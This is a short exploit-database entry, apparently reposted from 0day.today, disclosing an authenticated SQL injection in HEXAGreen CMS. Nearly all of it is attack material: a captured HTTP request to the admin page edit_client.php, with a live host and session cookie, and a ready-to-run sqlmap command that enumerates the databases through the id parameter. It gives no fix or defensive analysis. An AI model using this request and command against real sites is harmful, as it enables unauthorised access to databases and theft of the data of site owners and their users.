id: 39935
date: 03/06/2025
title: HEXAGreen CMS SQL Injection Vulnerability
author: Mehmet Can Kadıoğlu
cves: 

Title: HEXAGreen CMS - Authenticated SQLi

Description: HEXAGreen CMS authenticated error-based sql injection

Source URL: http://ezcode.pt/tests/hexagreen/admin/

Source Name/Email: Mehmet Can Kadıoğlu a.k.a mao7un

CVEs: N/A

Software URL: https://www.codester.com/items/36507/hexagreen-website-cms




PoC:
----------------------------------------------------------------------------------------------------------------
GET /tests/hexagreen/admin/edit_client.php?id=14 HTTP/2
Host: ezcode.pt
Cookie: PHPSESSID=kqd905v3pv99j7ko1ut6i2dbd6
Sec-Ch-Ua: "Not-A.Brand";v="99", "Chromium";v="124"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
----------------------------------------------------------------------------------------------------------------


save this request

sqlmap -r sqli.request --dbms mysql --dbs --batch --level 2 --risk 3
--time-sec 10 -p id

#  0day.today [2025-03-11]  #